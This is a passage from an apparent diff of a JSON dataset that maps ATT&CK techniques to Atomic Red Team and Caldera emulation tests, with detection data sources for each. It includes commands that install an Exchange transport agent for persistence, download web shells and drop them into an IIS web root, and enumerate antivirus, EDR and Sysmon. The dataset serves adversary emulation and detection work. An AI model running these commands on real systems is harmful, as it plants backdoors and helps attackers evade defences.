{\n foreach ($forensicProc in $ForensicProcessList) {\n if ($proc.name -like $forensicProc) {\n $procPath = Get-Process -Name $proc.Name | Sort-Object | Select-Object -Property Path | Get-Unique;\n Write-Host \"[!] Forensic process found: \" $proc.Name;\n Write-Host \"[!] Path: \" $procPath.Path;\n }\n }\n }\n}\n\nFind-ForensicProcesses($forensicProcesses);" + } + } + } + }, + { + "id": "5dc841fd-28ad-40e2-b10e-fb007fe09e81", + "name": "Virtual or Real", + "description": "Determine if the system is virtualized or physical", + "tactic": "discovery", + "technique": { + "attack_id": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks" + }, + "platforms": { + "windows": { + "psh": { + "command": "get-wmiobject win32_computersystem | fl model\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 
creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + 
"Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1505.002", + "command_list": [ + "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory -AssemblyPath #{dll_path}\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath c:\\program files\\microsoft\\Exchange Server\\v15\\bin\\Microsoft.Exchange.Security.Interop.dll\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "Install-TransportAgent -Name Security Interop Agent -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}\nEnable-TransportAgent Security Interop Agent\nGet-TransportAgent | Format-List Name,Enabled\n" + ], + "commands": [ + { + "command": "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory -AssemblyPath #{dll_path}\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "source": "atomics/T1505.002/T1505.002.yaml", + "name": "Atomic Red Team Test - Server Software Component: Transport Agent" + }, + { + "command": "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath c:\\program files\\microsoft\\Exchange 
Server\\v15\\bin\\Microsoft.Exchange.Security.Interop.dll\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "source": "atomics/T1505.002/T1505.002.yaml", + "name": "Atomic Red Team Test - Server Software Component: Transport Agent" + }, + { + "command": "Install-TransportAgent -Name Security Interop Agent -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}\nEnable-TransportAgent Security Interop Agent\nGet-TransportAgent | Format-List Name,Enabled\n", + "source": "atomics/T1505.002/T1505.002.yaml", + "name": "Atomic Red Team Test - Server Software Component: Transport Agent" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1505.002", + "display_name": "Server Software Component: Transport Agent", + "atomic_tests": [ + { + "name": "Install MS Exchange Transport Agent Persistence", + "auto_generated_guid": "43e92449-ff60-46e9-83a3-1a38089df94d", + "description": "Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. 
Seen in use by Turla.\nMore details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "class_factory": { + "description": "Class factory of transport agent.", + "type": "String", + "default": "Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory" + }, + "dll_path": { + "description": "Path of DLL to use as transport agent.", + "type": "Path", + "default": "c:\\program files\\microsoft\\Exchange Server\\v15\\bin\\Microsoft.Exchange.Security.Interop.dll" + }, + "transport_agent_identity": { + "description": "Friendly name of transport agent once installed.", + "type": "String", + "default": "Security Interop Agent" + } + }, + "dependencies": [ + { + "description": "Microsoft Exchange SnapIn must be installed\n", + "prereq_command": "Get-TransportAgent -TransportService FrontEnd\n", + "get_prereq_command": "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn\n" + } + ], + "executor": { + "command": "Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}\nEnable-TransportAgent #{transport_agent_identity}\nGet-TransportAgent | Format-List Name,Enabled\n", + "cleanup_command": "if(Get-Command \"Get-TransportAgent\" -ErrorAction Ignore){\n Disable-TransportAgent #{transport_agent_identity}\n Uninstall-TransportAgent #{transport_agent_identity}\n Get-TransportAgent\n}\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1505.003", + "command_list": [ + "xcopy /I /Y #{web_shells} C:\\inetpub\\wwwroot\n", + "xcopy /I /Y PathToAtomicsFolder\\T1505.003\\src\\ #{web_shell_path}\n" + ], + "commands": [ + { + "command": "xcopy /I /Y #{web_shells} C:\\inetpub\\wwwroot\n", + "source": "atomics/T1505.003/T1505.003.yaml", + "name": "Atomic Red Team Test - Server Software Component: Web Shell" + }, + { + "command": "xcopy /I /Y PathToAtomicsFolder\\T1505.003\\src\\ #{web_shell_path}\n", + "source": "atomics/T1505.003/T1505.003.yaml", + "name": "Atomic Red Team Test - Server Software Component: Web Shell" + 
} + ], + "parsed_datasets": [ + { + "attack_technique": "T1505.003", + "display_name": "Server Software Component: Web Shell", + "atomic_tests": [ + { + "name": "Web Shell Written to Disk", + "auto_generated_guid": "0a2ce662-1efa-496f-a472-2fe7b080db16", + "description": "This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.\nIdea from APTSimulator.\ncmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "web_shell_path": { + "description": "The path to drop the web shell", + "type": "String", + "default": "C:\\inetpub\\wwwroot" + }, + "web_shells": { + "description": "Path of Web Shell", + "type": "Path", + "default": "PathToAtomicsFolder\\T1505.003\\src\\" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Web shell must exist on disk at specified location (#{web_shells})\n", + "prereq_command": "if (Test-Path #{web_shells}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp\" -OutFile \"#{web_shells}/b.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp\" -OutFile \"#{web_shells}/tests.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx\" -OutFile \"#{web_shells}/cmd.aspx\"\n" + } + ], + "executor": { + "command": "xcopy /I /Y #{web_shells} #{web_shell_path}\n", + "cleanup_command": "del #{web_shell_path}\\b.jsp /q >nul 2>&1\ndel #{web_shell_path}\\tests.jsp /q >nul 2>&1\ndel #{web_shell_path}\\cmd.aspx /q >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + 
"definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1518.001", + "command_list": [ + "netsh.exe advfirewall show allprofiles\ntasklist.exe\ntasklist.exe | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr /i defender\ntasklist.exe | findstr /i cylance\n", + "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\n", + "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", + "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "fltmc.exe | findstr.exe 385201\n", + "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", + "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n", + "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n", + "echo $(get-uac)\n", + "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n" + ], + "commands": [ + { + "command": "netsh.exe advfirewall show allprofiles\ntasklist.exe\ntasklist.exe | findstr /i 
virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr /i defender\ntasklist.exe | findstr /i cylance\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "fltmc.exe | findstr.exe 385201\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n", + "source": "data/abilities/discovery/2dece965-37a0-4f70-a391-0f30e3331aba.yml", + "name": "Identify AV" + }, + { + "command": "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH 
AntiVirusProduct GET /value\n", + "source": "data/abilities/discovery/2dece965-37a0-4f70-a391-0f30e3331aba.yml", + "name": "Identify AV" + }, + { + "command": "echo $(get-uac)\n", + "source": "data/abilities/discovery/7c42a30c-c8c7-44c5-80a8-862d364ac1e4.yml", + "name": "Determine whether or not UAC is enabled" + }, + { + "command": "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n", + "source": "data/abilities/discovery/8c06ebf8-bacf-486b-bd77-21ba8c5a5777.yml", + "name": "Identify Firewalls" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1518.001", + "display_name": "Software Discovery: Security Software Discovery", + "atomic_tests": [ + { + "name": "Security Software Discovery", + "auto_generated_guid": "f92a380f-ced9-491f-b338-95a991418ce2", + "description": "Methods to identify Security Software on an endpoint\n\nwhen sucessfully executed, the test is going to display running processes, firewall configuration on network profiles\nand specific security software.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh.exe advfirewall show allprofiles\ntasklist.exe\ntasklist.exe | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr /i defender\ntasklist.exe | findstr /i cylance\n", + "name": "command_prompt" + } + }, + { + "name": "Security Software Discovery - powershell", + "auto_generated_guid": "7f566051-f033-49fb-89de-b6bacab730f0", + "description": "Methods to identify Security Software on an endpoint\n\nwhen sucessfully executed, powershell is going to processes related AV products if they are running.\n", + "supported_platforms": [ + "windows" + ], + 
"executor": { + "command": "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\n", + "name": "powershell" + } + }, + { + "name": "Security Software Discovery - ps (macOS)", + "auto_generated_guid": "ba62ce11-e820-485f-9c17-6f3c857cd840", + "description": "Methods to identify Security Software on an endpoint\nwhen sucessfully executed, command shell is going to display AV/Security software it is running.\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", + "name": "sh" + } + }, + { + "name": "Security Software Discovery - ps (Linux)", + "auto_generated_guid": "23b91cd2-c99c-4002-9e41-317c63e024a2", + "description": "Methods to identify Security Software on an endpoint\nwhen sucessfully executed, command shell is going to display AV/Security software it is running.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "name": "sh" + } + }, + { + "name": "Security Software Discovery - Sysmon Service", + "auto_generated_guid": "fe613cf3-8009-4446-9a0f-bc78a15b66c9", + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).\n\nwhen sucessfully executed, the test is going to display sysmon driver instance if it is installed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "fltmc.exe | findstr.exe 385201\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Security Software Discovery - AV Discovery via WMI", + "auto_generated_guid": "1553252f-14ea-4d3b-8a08-d7a4211aa945", + "description": 
"Discovery of installed antivirus products via a WMI query.\n\nwhen sucessfully executed, the test is going to display installed AV software.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "description": "Identify AV", + "id": "2dece965-37a0-4f70-a391-0f30e3331aba", + "name": "Discover antivirus programs", + "platforms": { + "darwin": { + "sh": { + "command": "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n", + "parsers": { + "plugins.stockpile.app.parsers.antivirus": [ + { + "source": "host.installed.av" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.installed.av" + } + ] + } + } + } + }, + "tactic": "discovery", + "technique": { + "attack_id": "T1518.001", + "name": "Software Discovery: Security Software Discovery" + } + }, + { + "id": "7c42a30c-c8c7-44c5-80a8-862d364ac1e4", + "name": "UAC Status", + "description": "Determine whether or not UAC is enabled", + "tactic": "discovery", + "technique": { + "attack_id": "T1518.001", + "name": "Software Discovery: Security Software Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "echo $(get-uac)\n" + } + } + } + }, + { + "id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777", + "name": "Identify Firewalls", + "description": "Identify Firewalls", + "tactic": "discovery", + "technique": { + "attack_id": "T1518.001", + "name": "Software Discovery: Security Software Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$NameSpace = Get-WmiObject -Namespace \"root\" -Class 
